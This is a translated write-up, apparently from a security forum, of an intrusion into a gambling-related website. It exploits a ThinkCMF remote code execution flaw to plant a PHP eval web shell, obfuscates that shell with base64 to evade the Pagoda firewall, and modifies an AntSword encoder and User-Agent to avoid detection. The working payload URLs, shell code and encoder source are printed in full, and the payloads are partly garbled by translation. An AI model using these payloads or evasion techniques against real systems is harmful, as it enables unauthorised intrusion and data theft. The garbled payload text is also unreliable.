Title: Record the penetration of BC stations that bypasses the Pagoda firewall

0x00  Information Collection

Since the main site has cloud waf, it will be blocked as soon as it is tested, and there is no hole that can be used in the preliminary test, so I switch to the sub-site and hope to obtain valuable information through the sub-site.

This is a site that querys the proxy account. url input admin will automatically jump to the background.

Look at this parameter and guess it might be thinkCMF

0x01 getshell

thinkcmf happens to have an RCE. You can try it

?a=fetchtemplateFile=public/indexprefix=''content=phpfile_put_contents('test1.php','?php @eval($_POST[zero])?')/php

A white screen is a good sign, it should be successful

Visit

Try the Ant Sword Connection and report an error directly. I guess I might have encountered a firewall

Then come back and see the shell manually try a phpinfo

Sure enough, there is a pagoda firewall

0x02 Bypass the Pagoda Firewall

The pagoda should filter some functions, so it is definitely not possible to pass the payload directly, so we need to obfuscate the traffic.

Try to transfer all payload Base64 encoding

Since the coded Base64 is passed down, Xiao Ma should also make changes accordingly. Just decrypt the passed base64 once.

The pony is as follows:

?php @eval(base64_decode($_POST[zero]));

Encoding phpinfo();base64 as cGhwaW5mbygpOw==

send

It can be seen that the pagoda firewall has not been intercepted anymore and has successfully bypassed the pagoda firewall.

0x03 Transformation of ant sword

We use Base64 encoding, but Ant Sword actually comes with its own Base64 encoding and decoder.

Try to use the included Base64 encoder directly

Why is this happening?

We try to analyze the flow from the Ant Sword

Set up proxy to burp

Intercept traffic

We can see that there are obviously two places that are easily recognized by waf.

One is: the keyword of the User-Agent header: antSword/v2.1 This is equivalent to telling waf who I am, so this is the first point to be changed.

Second, the traffic of the ant sword actually has keywords. For example, the eval base64_decode after the cmd parameter is all, and our pony comes with Base64 decryption, so using its default encoder not only cannot pass waf, but even without waf, it cannot connect to our pony normally, so we need to define the encoder by ourselves.

Create a new PHP encoder

Since we only need to encode payloadBase64 once, we can directly process the assignment of data['_']Base64. It doesn't matter whether there are any random parameters.

The encoder is as follows

'use strict';

/*

* @param {String} pwd Connection Password

* @param {Array} data Payload array before encoder processing

* @return {Array} data The payload array processed by the encoder

*/

module.exports=(pwd, data, ext={})={

data[pwd]=Buffer.from(data['_']).toString('base64');

delete data['_'];

return data;

}

Then modify the UA header

Apply our encoder The decoder does not need to be specified by default

Recommended to choose to add spam data and Multipart packets

Test the connection again

Then click on the directory and find that there is still a problem. You cannot cross the directory. This problem can actually be solved by Godzilla. Upload Godzilla Horse.

Someone may ask here, then just upload Godzilla Horse directly? The actual situation is that there is a length limit for the get parameter transmission, and some symbols will cause truncation of the php file to be unable to be uploaded intact.

There are quite a lot of websites, but it's a pity that there is no main site. There are only a bunch of proxy accounts in the database. It's a waste of time

0x03  Summary

1. When accessing the target main site of the BC, there is no exploitable vulnerability. By accessing the sub-site and entering the admin directory, jump to the background. 2. Through cms fingerprint query, it is found that the sub-site is thinkcmf framework 3. Execute rce to write a sentence http://www.xxx.com/?a=fetchtemplateFile=public/indexprefix=''content=file_put_contents('test1.php','?php @eval($_POST[zero])?')4. Access address http://www.xxx.com/test1.php shows blank. 5. Try the ant sword connection, report an error directly, execute the post command, and find that the pagoda firewall is displayed http://www.xxx.com/test1.phppost:zero=phpinfo();6. Here RCE writes a sentence base64 encryptionhttp://www.xxx.com/?a=fetchtemplateFile=public/indexprefix=''content=file_put_contents('test2.php','?php @eval(base64_decode($_POST[zero]));')7. Encode phpinfo();base64 as cGhwaW5mbygpOw==and request normal access to http://www.xxx.com/test2.phppost:zero=cGhwaW5mbygpOw==7 Pagoda firewall will intercept the User-Agent of the Ant Sword and the keywords containing the command execution such as the eval base64_decode after the cmd parameter. One is: the keyword of the User-Agent header: antSword/v2.1. This is equivalent to telling waf who I am, so this is the first point to be changed. Second, the traffic of the Ant Sword is actually still keywords. For example, the eval base64_decode after the cmd parameter is all, and our little horse comes with Base64 decryption 8, which transforms the default base64 encoder 'use strict';

/** @param {String} pwd Connection Password* @param {Array} data Payload array before encoder processing* @return {Array} data Payload array after encoder processing*/module.exports=(pwd, data, ext={})={

data[pwd]=Buffer.from(data['_']).toString('base64');

delete data['_'];

return data;}9. Modify the UA header name: in the request information of the Ant Sword User-Agentvaule: to the ordinary http request value 10. Connect through the modified Ant Sword loaded with the modified encoder. Click the directory to still not access it. 12. The same method is used to load and remodel the default base64 encoder in Godzilla, which can bypass the pagoda firewall and access it normally

Original link: https://xz.aliyun.com/t/9295